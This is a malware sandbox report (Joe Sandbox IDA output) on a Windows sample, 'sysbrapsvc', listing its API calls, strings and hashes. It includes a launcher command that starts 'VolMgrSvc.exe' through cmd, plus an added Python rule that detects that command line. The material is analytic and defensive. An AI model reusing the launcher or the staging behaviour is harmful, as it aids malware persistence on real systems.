                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                                • String ID:
                                                                                • API String ID: 3902698870-0
                                                                                • Opcode ID: 643dd6457151afb767136b96de088e300be71ca2aa9c529637807d59cb8df3e5
                                                                                • Instruction ID: 32b63ebe374edb734f10ceafdcfe6a9e739b08b32ae31a868bafe8a6799fa03f
                                                                                • Opcode Fuzzy Hash: 643dd6457151afb767136b96de088e300be71ca2aa9c529637807d59cb8df3e5
                                                                                • Instruction Fuzzy Hash: 20514EB4E40209FBDB14DFA4CC49BDEB774AB48704F108569E611B72C0D7B9AA40CB98
                                                                                APIs
                                                                                • GetCurrentThread.KERNEL32 ref: 0040D786
                                                                                • GetThreadPriority.KERNEL32(00000000,?,?,?,00407F75,?,000000FF), ref: 0040D78D
                                                                                • GetCurrentThread.KERNEL32 ref: 0040D798
                                                                                • SetThreadPriority.KERNEL32(00000000,?,?,?,00407F75,?,000000FF), ref: 0040D79F
                                                                                • InterlockedExchangeAdd.KERNEL32(00407F75,00000000), ref: 0040D7C2
                                                                                • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D7F7
                                                                                • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D842
                                                                                • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D85E
                                                                                • Sleep.KERNEL32(00000001), ref: 0040D88E
                                                                                • GetCurrentThread.KERNEL32 ref: 0040D89D
                                                                                • SetThreadPriority.KERNEL32(00000000,?,?,?,00407F75), ref: 0040D8A4
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                • String ID:
                                                                                • API String ID: 3862671961-0
                                                                                • Opcode ID: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                                                                • Instruction ID: 6fb5641eb3e61aabfeb8d94b6f23565c140e371fca94fd76c4ad34d85bd1d77f
                                                                                • Opcode Fuzzy Hash: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                                                                • Instruction Fuzzy Hash: 32414C75E00209EBCB04EFE4D848BAEBB71EF44305F10C16AE916A7384D6789A85CF55
                                                                                APIs
                                                                                • memset.NTDLL ref: 0040EE3E
                                                                                • memset.NTDLL ref: 0040EE4E
                                                                                • CreateProcessW.KERNEL32(00000000,00407896,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040EE87
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040EE97
                                                                                • ShellExecuteW.SHELL32(00000000,open,00407896,00000000,00000000,00000000), ref: 0040EEB2
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040EECC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                • String ID: $D$open
                                                                                • API String ID: 3787208655-2182757814
                                                                                • Opcode ID: aaa8efd2447e76ebee4be6377d3fcdc8a7337733f8d70036db534e1e8db572fc
                                                                                • Instruction ID: ab95b539b52ee8c861e7b35bb7843e11e17158efae48c82db73052011d4181fd
                                                                                • Opcode Fuzzy Hash: aaa8efd2447e76ebee4be6377d3fcdc8a7337733f8d70036db534e1e8db572fc
                                                                                • Instruction Fuzzy Hash: F2113071A4430CBAEB10DB90DD46FDE7764AB14B00F104125FA057E2C0D6F5AA548759
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                                • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                                • setsockopt.WS2_32 ref: 00401F2C
                                                                                • closesocket.WS2_32(?), ref: 00401F39
                                                                                  • Part of subcall function 0040D950: NtQuerySystemTime.NTDLL(0040B865), ref: 0040D95A
                                                                                  • Part of subcall function 0040D950: RtlTimeToSecondsSince1980.NTDLL ref: 0040D968
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                • String ID:
                                                                                • API String ID: 671207744-0
                                                                                • Opcode ID: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                                                                • Instruction ID: 68686fb6eff55c499ad5be399ae1fa7ea08460e57826cc3027d59358e60976cc
                                                                                • Opcode Fuzzy Hash: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                                                                • Instruction Fuzzy Hash: 34519E75608B02ABC704DF39D488B9BFBE4BF88314F44872EF89983360D775A5458B96
                                                                                APIs
                                                                                • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DD8E
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040DD9E
                                                                                • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DDBB
                                                                                • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DDD1
                                                                                • StrChrA.SHLWAPI(?,0000000D), ref: 0040DDFE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleeprecvfrom
                                                                                • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                • API String ID: 668330359-3973262388
                                                                                • Opcode ID: eefe196d39f416e400a4d4ef2e05462a5a71bb0c03a382919cece79f19d7d758
                                                                                • Instruction ID: 7b96b2f8d6d36e055c6c7570a615b3eea8bd5cb55d36e980e60cabbeadb8daeb
                                                                                • Opcode Fuzzy Hash: eefe196d39f416e400a4d4ef2e05462a5a71bb0c03a382919cece79f19d7d758
                                                                                • Instruction Fuzzy Hash: 78216FB5940218ABDB20DB64DC49BE97774AF04308F1085E9E709BB2D0D6B95AC6CF9C
                                                                                APIs
                                                                                • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EEF7
                                                                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EF16
                                                                                • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040EF3F
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EF68
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EF72
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040EF7D
                                                                                Strings
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EEF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                                • API String ID: 2743515581-2272513262
                                                                                • Opcode ID: be2b98b0d1d94f3769b5301c8c7766c76a7eb5c2fd3991898107c864a0abb6dc
                                                                                • Instruction ID: 09246262baac8142bf73057cdf9805b9640511cbdee0a0d8a20d2e1b7007a2ac
                                                                                • Opcode Fuzzy Hash: be2b98b0d1d94f3769b5301c8c7766c76a7eb5c2fd3991898107c864a0abb6dc
                                                                                • Instruction Fuzzy Hash: 6A210A75A40309FBDB10DFA4CC49FEEB775AB08705F1085A9FA11AB2C0C7B96A44CB59
                                                                                APIs
                                                                                • InitializeCriticalSection.KERNEL32(0041AE68,?,?,?,?,?,?,00407EF9), ref: 0040B77B
                                                                                • CreateFileW.KERNEL32(0041AC50,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B7CD
                                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B7EE
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B80D
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B822
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B888
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040B892
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040B89C
                                                                                  • Part of subcall function 0040D950: NtQuerySystemTime.NTDLL(0040B865), ref: 0040D95A
                                                                                  • Part of subcall function 0040D950: RtlTimeToSecondsSince1980.NTDLL ref: 0040D968
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                • String ID:
                                                                                • API String ID: 439099756-0
                                                                                • Opcode ID: c6295368b3329a36b4d5b539f0c7913c2e24e4bff1a22c952df061e282144c4a
                                                                                • Instruction ID: 479a2d3db74d12cc9ab5db8b9028aebaa0e2ca82416c5c7c2c0831f1d1863687
                                                                                • Opcode Fuzzy Hash: c6295368b3329a36b4d5b539f0c7913c2e24e4bff1a22c952df061e282144c4a
                                                                                • Instruction Fuzzy Hash: FB417C75E40309ABDB10EFA4CC4ABAEB774EB44704F20842AFA11B72D1C7B96541CB9D
                                                                                APIs
                                                                                • InitializeCriticalSection.KERNEL32(0041A400,?,?,?,?,?,00407EC3), ref: 00405B6B
                                                                                • CreateFileW.KERNEL32(0041A630,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407EC3), ref: 00405B85
                                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405BA6
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405BC5
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405BDE
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 00405C6B
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405C75
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 00405C7F
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                • String ID:
                                                                                • API String ID: 3956458805-0
                                                                                • Opcode ID: 284b283459330de0b1143f1684a29cd07a22339025804f57593563af66457d89
                                                                                • Instruction ID: 34cf97d68150feb52ab64e4c1d62c08212747bf40ca63f75f299d91bb9f0c47d
                                                                                • Opcode Fuzzy Hash: 284b283459330de0b1143f1684a29cd07a22339025804f57593563af66457d89
                                                                                • Instruction Fuzzy Hash: 5D313A74A40308EBEB10DBA4CD4ABAFB770EB44704F208529E601772D0D7B96A81CF99
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0041A400,00000000,0040BDA2,006A0266,?,0040BDBE,00000000,0040D09C,?), ref: 0040600F
                                                                                • memcpy.NTDLL(?,00000000,00000100), ref: 004060A1
                                                                                • CreateFileW.KERNEL32(0041A630,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004061C5
                                                                                • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406227
                                                                                • FlushFileBuffers.KERNEL32(000000FF), ref: 00406233
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040623D
                                                                                • LeaveCriticalSection.KERNEL32(0041A400,?,?,?,?,?,?,0040BDBE,00000000,0040D09C,?), ref: 00406248
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                                • String ID:
                                                                                • API String ID: 1457358591-0
                                                                                • Opcode ID: 7d39a30a029986bca7bb4f0c5866fafd33a6f5de3b8d974b21aec683df7cdf74
                                                                                • Instruction ID: 2241f90cca7a27a2546e95c76b2552fd8efe4d50fa40d22b7b041634b3385480
                                                                                • Opcode Fuzzy Hash: 7d39a30a029986bca7bb4f0c5866fafd33a6f5de3b8d974b21aec683df7cdf74
                                                                                • Instruction Fuzzy Hash: 4271CFB4E002099BCB04CF94D985FEFB7B1AB48304F14857DE505BB382D779A951CBA6
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E7AC
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E7FB
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E80F
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E827
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: device$deviceType
                                                                                • API String ID: 1602765415-3511266565
                                                                                • Opcode ID: 566d6412d8e9607f6d1003a374969e2899c9cbeba23211f1a4d6a59564ece201
                                                                                • Instruction ID: 7a529818069a58d4d2ae4584624926d6a8b7ee91a4ee1179ae14f9cec19009dd
                                                                                • Opcode Fuzzy Hash: 566d6412d8e9607f6d1003a374969e2899c9cbeba23211f1a4d6a59564ece201
                                                                                • Instruction Fuzzy Hash: FC412AB5A0020ADFCB04DF99C884BAFB7B9FF48304F108569E515A7390D778AE85CB94
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E64C
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E69B
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6AF
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6C7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: service$serviceType
                                                                                • API String ID: 1602765415-3667235276
                                                                                • Opcode ID: 4e76592112a6a420ff5714064f2ae1a029c18f39b0799c1555199cf660da6998
                                                                                • Instruction ID: 0dd75c4ae2219cb0414d4c222623d171442623ab9389109279868d9d6e555a3a
                                                                                • Opcode Fuzzy Hash: 4e76592112a6a420ff5714064f2ae1a029c18f39b0799c1555199cf660da6998
                                                                                • Instruction Fuzzy Hash: FA413C74A0020ADFCB04CF99D884BAFB7B5BF58304F508969E505A7390D779EA91CF94
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 3168844106-0
                                                                                • Opcode ID: f3ad203a95010958b8c1f3f107c3da268ef795d58a7c48103c0b3f0c6d45af56
                                                                                • Instruction ID: 37460acbf0a505b6a9388cec97320328f7083b01a8d1f88c89259c7d7d106706
                                                                                • Opcode Fuzzy Hash: f3ad203a95010958b8c1f3f107c3da268ef795d58a7c48103c0b3f0c6d45af56
                                                                                • Instruction Fuzzy Hash: A031E172200315ABC710AFB5ED8CAD7B7A8FF44324F04463EF58AD3280DB79A4449B99
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 0040640B
                                                                                • CoCreateInstance.OLE32(00412920,00000000,00000001,00412900,?), ref: 00406423
                                                                                • wsprintfW.USER32 ref: 00406456
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateInitializeInstancewsprintf
                                                                                • String ID: %comspec%$/c start %s & start %s\VolMgrSvc.exe$Gh@
                                                                                • API String ID: 2038452267-1176807594
                                                                                • Opcode ID: 453316c8e6568e69a2546e2d17e52215310be9e24d50f63276e7ec173b6e4f87
                                                                                • Instruction ID: 2c6fb4a3d0a1bb960828f31a0de6db084021911c18f79e55e776afc792a10ffb
                                                                                • Opcode Fuzzy Hash: 453316c8e6568e69a2546e2d17e52215310be9e24d50f63276e7ec173b6e4f87
                                                                                • Instruction Fuzzy Hash: 1931C975A40208EFCB04DF98D885FDEB7B5EF88704F208199E519A73A5CB74AE81CB54
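The record above shows the sample building the command line `%comspec% /c start %s & start %s\VolMgrSvc.exe` with wsprintfW before handing it to a COM object created by CoCreateInstance. The following detection, added here as an illustration and not part of Joe Sandbox or the sample, matches that launcher shape in process-creation telemetry: `%comspec%` expands to `cmd.exe`, the first `start` operand is whatever filled the first `%s`, and only the second operand's file name, `VolMgrSvc.exe`, is fixed. The event records and every path in them are constructed placeholders, not paths observed in this analysis.

```python
r"""Detect process creations matching the launcher this sample formats with
wsprintfW: `%comspec% /c start %s & start %s\VolMgrSvc.exe`.
Added example for this report, not sandbox code. SAMPLE_EVENTS are constructed
and the paths in them are placeholders, not paths observed in the analysis.
"""
import re
from typing import Dict, Iterable, List, Optional

# %comspec% expands to cmd.exe, so the formatted string reaches the OS as
# `cmd.exe /c start <first> & start <dir>\VolMgrSvc.exe`. The first `start`
# operand is whatever filled the first %s; only the second target is fixed.
LAUNCHER_RE = re.compile(
    r'^"?(?:[a-z]:\\[^"]*?\\)?cmd(?:\.exe)?"?\s+/c\s+'
    r'start\s+(?P<first>"[^"]+"|\S+)\s*&\s*'
    r'start\s+(?P<second>"[^"]+"|\S+)\s*$',
    re.IGNORECASE,
)
SERVICE_SUFFIX = "\\volmgrsvc.exe"


def match_launcher(cmdline: str) -> Optional[Dict[str, str]]:
    """Return the two staged paths if cmdline is the VolMgrSvc launcher, else None."""
    m = LAUNCHER_RE.match(cmdline.strip())
    if not m:
        return None
    second = m.group("second").strip('"')
    if not second.lower().endswith(SERVICE_SUFFIX):
        return None  # `cmd /c start a & start b` chaining to some other target
    return {"first": m.group("first").strip('"'),
            "service_dir": second[: -len(SERVICE_SUFFIX)]}


def detect(events: Iterable[Dict]) -> List[Dict]:
    """Run match_launcher over process-creation events; keep pid and parent for triage."""
    hits = []
    for ev in events:
        found = match_launcher(ev.get("cmdline", ""))
        if found:
            hits.append({"pid": ev["pid"], "parent": ev.get("parent"), **found})
    return hits


# Constructed process-creation events (not taken from the report).
SAMPLE_EVENTS = [
    {"pid": 4120, "parent": r"C:\Users\user\Desktop\sample.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c start C:\Users\user\Desktop\sample.exe & start C:\Windows\VolMgrSvc.exe'},
    {"pid": 4133, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"cmd.exe /c start notepad.exe"},
    {"pid": 4140, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'cmd.exe /c start "" "C:\Program Files\Tool\tool.exe" & start "C:\Program Files\Tool\helper.exe"'},
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

Matching on the `start X & start <dir>\VolMgrSvc.exe` structure rather than on `VolMgrSvc.exe` alone keeps the rule tied to the format string in the record, so a legitimately named binary on a host does not fire it; the parent image is carried along because the COM-launched cmd.exe will not have the sample as its direct parent in every telemetry source.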
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E7AC
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E7FB
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E80F
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E827
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: device$deviceType
                                                                                • API String ID: 1602765415-3511266565
                                                                                • Opcode ID: 438aa6f8a1e56f1ba1290af2e787a3c8fe9300d957a7e67b1fd036078c6987af
                                                                                • Instruction ID: 0e4cd8c02c4e5e279ec4fd0352b83bc081febda0d06dc7f405a75fcd32bf7d71
                                                                                • Opcode Fuzzy Hash: 438aa6f8a1e56f1ba1290af2e787a3c8fe9300d957a7e67b1fd036078c6987af
                                                                                • Instruction Fuzzy Hash: AF3109B1E0020ADFCB04DF99D884BAFB7B5EF88304F108569E514A7390D778AA85CB94
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E64C
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E69B
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6AF
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6C7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: service$serviceType
                                                                                • API String ID: 1602765415-3667235276
                                                                                • Opcode ID: fc8eedfaf3eb06c849d6c627dcf627ee8089590ee6ebef9678790b2faf78124f
                                                                                • Instruction ID: dde9dd1fd58b67a95de0ca68c0f21478634a56bbec0f0045ca3d2b9f6da46dfd
                                                                                • Opcode Fuzzy Hash: fc8eedfaf3eb06c849d6c627dcf627ee8089590ee6ebef9678790b2faf78124f
                                                                                • Instruction Fuzzy Hash: 4F312D70A0010ADFCB04CF96D884BEFB7B5BF58304F508969E515A7390D7799991CF94
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
